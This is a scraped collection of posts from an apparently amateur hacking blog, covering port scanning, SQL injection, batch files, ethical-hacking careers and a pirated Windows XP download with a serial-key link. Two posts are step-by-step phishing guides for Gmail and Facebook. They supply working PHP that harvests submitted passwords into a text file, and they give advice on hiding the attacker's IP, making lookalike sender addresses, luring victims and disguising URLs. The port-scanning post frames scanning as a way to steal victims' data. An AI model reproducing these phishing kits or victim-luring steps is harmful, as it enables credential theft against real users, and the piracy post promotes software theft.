What is Port Scanner? what is the use? | AMANAHAD Tech

In my last post i gave you the list of best port scanner tools. In this post i will explain about port scanning process and use of port scanning.

Port Scanning:
Port scanning is the process of searching for active or opened ports in victim system. Just like a thief searching for gate opened house. Consider this scanning



Starting Scan.

Target Host: www.yourcompany.com or IP Address

TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.


It shows the active ports in that domain or ip address


What is the Use?
what we can do with these ports? we can communicate with the victim system remotely using those active ports. So we can get their data without their knowledge.(The thing is that you can theft their data).


Scanning for open ports is done in two ways.

• Scan a single IP address for open ports:
  It just like a thief who searching for any opened gate in single house.
  In relation to scanning, the gate is port and house is IP address.
  We are searching for the active port in a single IP address
  Eg:
  searching for active ports only at 123.xx.xx.xx
  
• Scan a range of IP address to find open ports:
  Scanning a range of IP address is like thief who searching for any opened gate in a street. In relation to scanning, the gate is ports and street is range of ip address
  
  Eg:
  searching active ports only at
  123.20.xx.xx to 123.30.xx.xx

by Triple A A-@-A

Publisher: Unknown - 12:31

What is Database and MY SQL Injections | AMANAHAD Tech

In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

What is the Database?
  Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.


Database is a place that stores username,passwords and more details.  Database should be secured.  But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).

Some List of Database are:

• DB servers,
• MySQL(Open source), 
• MSSQL, 
• MS-ACCESS, 
• Oracle, 
• Postgre SQL(open source), 
• SQLite,

 What is SQL injection?
      SQL injection is Common and famous method of hacking  at present .  Using this method an unauthorized person can access the database of the website.  Attacker can get all details from the Database.

What an attacker can do?

• ByPassing Logins
• Accessing secret data
• Modifying contents of website
• Shutting down the My SQL serve

by Triple A A-@-A

Publisher: Unknown - 12:28

A small Introduction about Batch Programming for Hackers | AMANAHAD Tech

What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.

They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.

Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.



Basic Batch File Utilities and Commands


Note: Any DOS command can be used within a batch file, below are a list of commands used to support the structure and flow of the batch file

@
Place @ in front of commands that you don't want echoed within the process.

CLS
Clears the screen of any previous data.

CALL
Calls another batch file. Once other batch file isfinished, control is returned to the first (i.e. CALL c:\Windows\Newbat.bat).

BREAK ON/OFF
When turned on within the batch file, the user has an option of stopping the batch file by bressing Ctrl+Break.

GOTO - This command is used to go to another section of the batch file. Sections can be added by adding a colon infront of a name

(i.e. :FIRSTSECTION, :SECONDSECTION):

Quote::FIRSTSECTION
REM Welcome to the first section
GOTO :SECONDSECTION

Quote: :SECONDSECTION
REM Welcome to the second section
GOTO :END
:END

It is possible to loop with the GOTO command:

Quote::START
REM NO!!!!!!!!!!!!!!!!!! IT'S LOOPING!!!!!!!!!!!!!
GOTO :START

PAUSE
The pause command halts a proccess until a key is hit by the user. Displays the message, "Press any key to continue..."

REM
Allows a remark to be placed within the code, displaying a message to the user (i.e. REM HELLO!).

ECHO ON
Command process is shown to user; @ is usually placed before (@ECHO ON).

ECHO OFF
Command process is not shown to the user; @ is usually placed before (@ECHO OFF).

end
Ends the process.


Simple Batch Programming to show Hello message is :

@echo off
echo "hello world"

Type this code into notepad and save it with .bat extenstion(For eg: hello.bat)

By double clicking the batch file,you can run the file. Above batch file will show the hello world but we can' see it. because the window will open and closed within a second.

We will see later how to see it.

by Triple A A-@-A

Publisher: Unknown - 12:25

How to create fake or Phishing web page for gmail | AMANAHAD Tech

 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:

Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with

action="http://yoursite urlhere/login.php"

 save the file.
Step6:
Now you need to create login.php
 so you need to open the notepad and type as

<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

by Triple A A-@-A

Publisher: Unknown - 12:23

How to Hack Facebook Account Using Phising webPage | AMANAHAD Tech

BTS' readers used to ask me how to hack Facebook accounts.  Most of the people curious to know how hackers take control of their accounts.  In this post, let me clarify those doubts.

Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .

Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.

Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.

Let me explain how to create a facebook phishing page.

Step 1:
Go to facebook and right click on website .  Select "View source" and copy the code to notepad.


Step2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:

Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.

Open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "login.php"

Step 4:

Open the notepad and just save the file as "pswrds.txt" (without any contents).

Step 5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 

Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.

Note:
The above article is for educational purpose only, written for beginners of Ethical hacking or Pentesting to understand the basics so that it will be easy for them to understanding advanced topics.

Publisher: Unknown - 12:20

How to Become a Penetration Tester/Ethical Hacker//Security Professional? | AMANAHAD

I have been asked for tips to become Ethical Hacker or Penetration tester via email.  So In this article, i am going to guide you to get into the Penetration Testing world.

If you are seeing this article, then it means that you already heard about Ethical Hacking and PenTesting.  Anyway, i just like to give small definition about Ethical hacking.

What is Ethical Hacking and Ethical Hacker?
Ethical Hacking, also known as Penetration testing, is the process of vulnerability testing or hacking the system with a permission from corresponding vendor.  Normally, organization who are in the need of security recruits Ethical Hacker or PenTester for improving their security.

Ok, let us come to the article.

How to Become an Ethical Hacker?

1. Dedication : Dedication is the main key to become an ethical hacker. Don't plan to become pentester because of money.  If you really have interest, then go ahead.
2. Reading :  Be a bookworm.  Try to read books related to computer and its architecture.  Buy books related to Security and Ethical hacking. 
3. Know how hackers hack into: You can not solve the problem until you know what is behind the problem.  So you have to learn  method of hackers. How ??! Just read the articles provided in our site.
4. Programming and Scripting: Learn Some programming or scripting languages because most of time you will need to write a code to break into a system.  Also, you have to know the coding for understanding how a system works,then only you can penetrate into.  Ok, which language?! My suggestion is C. I Love C programming.  It is one of best,powerful language and easy to learn.  Some peoples prefer python.  As far as i am concerned, once you learned one language, it is easy for you to learn any other languages. There are are plenty of online programming tutorial sites are out there. 
5. Linux: Ok, it is time to switch from Windows to Linux.  Learn to work with Linux.
6. BackTrack Linux Distribution: Backtrack Linux is one of the famous Penetration Testing Linux distribution.  This backtrack is funded by Offensive Security.  It has almost all penetration testing tools required for security professionals.
7. Get Certification for Ethical Hackers:   Some organization recruits based on security certification.  You can learn and get ethical certification from your nearest center.  Search in google for these keywords "CEH","OSCP","security certifications".  Anyway, if you have dedication and confidence, you don't need a certificate and get into a firm easily.
8. BreakTheSecurity: In BreakTheSecurity , i have written plenty of articles related to Ethical hacking and penetration testing.  Hope it will help you to get some knowledge.  Also, you can find the latest ethical hacking techniques here. 
9. Forums: Participate in any Security or ethical Hacking related forums.  
10. Need help?! feel free to contact me

Opportunities for Ethical Hacker
There are plenty of jobs available in government organisations, banks, financial institutions, military establishments and private companies. India requires more Ethical Hackers.

by Triple A A-@-A

Publisher: Unknown - 12:13

Windows XP Professional SP2 32 - / 64 - Bit (Full Version ) Free download | AMANAHAD Tech

Windows XP Professional SP2 32 - / 64 - Bit (Full Version ) Free download free download Windows XP Professional SP2 32 - / 64 - Bit (Full Version) 2003 Service Microsoft Windows Server Pack 2 (SP2) is a cumulative service pack that includes the latest updates and provides enhancements to security and service pack stability.This is available for Windows XP Professional x64 Edition and x86

Free Download Windows XP Professional SP2 32 - / 64 - Bit (Full Version)

Microsoft Windows XP was introduced in 2001 and is the most significant development for the Windows operating system since Windows 95. The previous version of Windows, called Windows Me (Millennium Edition or) still had the look and feel of Windows 95 and has been known to have stability problems and incompatibilities with certain hardware

.

Windows XP addressed many issues of its predecessor and added a number of other improvements as well. It is a stable operating system because it is built on the Windows 2000 kernel, which is known for its reliability. XP also has a new look, more modern, and an interface that is easier to navigate than previous versions of Windows. Even if it is not written from scratch, such as Mac OS X, Windows XP is a critical update system updates. The letters XP stand Experience , ie the operating system is supposed to be a new type of user experience

.

Service Pack 2 Features:

• Blocker de annoying pop (pop-up) Internet Explorer Analysis
• downloads in Internet bar information
• Internet Explorer
• day explorer security settings of Internet Explorer
• administrator additional modules Internet Explorer Administrator
• documents attached updates
• Windows Messenger
• update confidentiality in Outlook Express
• Security Center Windows Update
• Windows Firewall
• cover the start-up and stop the Windows Firewall
• mere compatibility configuration Windows Firewall
• Improved automatic updates
• Improved coverage of wireless

supported

Windows Server 2003 R2 x64 editions of Windows Server 2003 x64, Windows XP Professional x64 and x86 Edition

Free Download Windows XP Professional SP2 32 - / 64 - Bit

< b> DOWNLOAD:

Windows XP Professional SP2 32-bit 

Windows XP Professional SP2 64 - Bit

Serial Key for XP 32/64 bit:

Download serial key for Free Click Here..

by Triple A A-@-A

Publisher: Unknown - 19:36